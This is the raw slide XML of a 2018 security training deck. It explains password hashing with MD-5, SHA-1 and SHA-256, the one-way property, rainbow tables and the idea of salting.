              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="&quot;5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5340465" y="10194768"/>
            <a:ext cx="14506377"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="&quot;password&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10466598" y="3852955"/>
            <a:ext cx="3450804"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"password"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12192000" y="4948766"/>
            <a:ext cx="1" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="767" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179625" y="8535271"/>
            <a:ext cx="1" cy="1635939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="MD-5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664853" y="6742018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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MD-5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="https://en.wikipedia.org/wiki/Cryptographic_hash_function"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Cryptographic_hash_function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="770" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771" name="SHA-1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10509514" y="6742018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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SHA-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772" name="SHA-256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14354175" y="6742018"/>
            <a:ext cx="3364971" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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SHA-256</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="773" name="..."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159912" y="6945748"/>
            <a:ext cx="706016"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="..."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18518072" y="6945748"/>
            <a:ext cx="706017"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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8" name="One-Way"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>One-Way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="779"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780"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781" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="&quot;5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5340465" y="10194768"/>
            <a:ext cx="14506377"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="&quot;?????????&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10227009" y="3852955"/>
            <a:ext cx="3929982"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"?????????"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12192000" y="4948766"/>
            <a:ext cx="1" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="C62818"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="786" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179625" y="8535271"/>
            <a:ext cx="1" cy="1635939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="C62818"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787" name="MD-5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664853" y="6742018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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MD-5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="https://en.wikipedia.org/wiki/Cryptographic_hash_function"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Cryptographic_hash_function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="789" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="SHA-1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10509514" y="6742018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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SHA-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="SHA-256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14354175" y="6742018"/>
            <a:ext cx="3364971" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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SHA-256</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="792" name="..."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159912" y="6945748"/>
            <a:ext cx="706016"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="793" name="..."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18518072" y="6945748"/>
            <a:ext cx="706017"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>...</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97"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798"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799" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="http://project-rainbowcrack.com/table.htm"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="38D142"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://project-rainbowcrack.com/table.htm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="802" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="803" name="rainbow-tables-sha1.png" descr="rainbow-tables-sha1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="840307" y="3946514"/>
            <a:ext cx="22703386" cy="8295107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Rainbow Tables"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015016" y="1387078"/>
            <a:ext cx="22353968"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defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rainbow Tables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hacker-keyboard-dark-room.jpg" descr="hacker-keyboard-dark-room.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-2348376"/>
            <a:ext cx="24384001" cy="16256001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Identify, exploit, and protect against a wide variety of security vulnerabilities."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="429768">
              <a:defRPr sz="10528"/>
            </a:pPr>
            <a:r>
              <a:t>Identify, </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:t>, and protect against a wide variety of security vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="202"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20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04" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205"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08" name="salt-costume.jpg" descr="salt-costume.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="15000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24384000" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="809"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810"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811" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Wat?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6747871" y="2618667"/>
            <a:ext cx="739107" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Wat?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7590632" y="2930192"/>
            <a:ext cx="2627495" cy="959635"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815" name="So what is this “salting” thing?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="457200">
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So what is this “salting” thing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
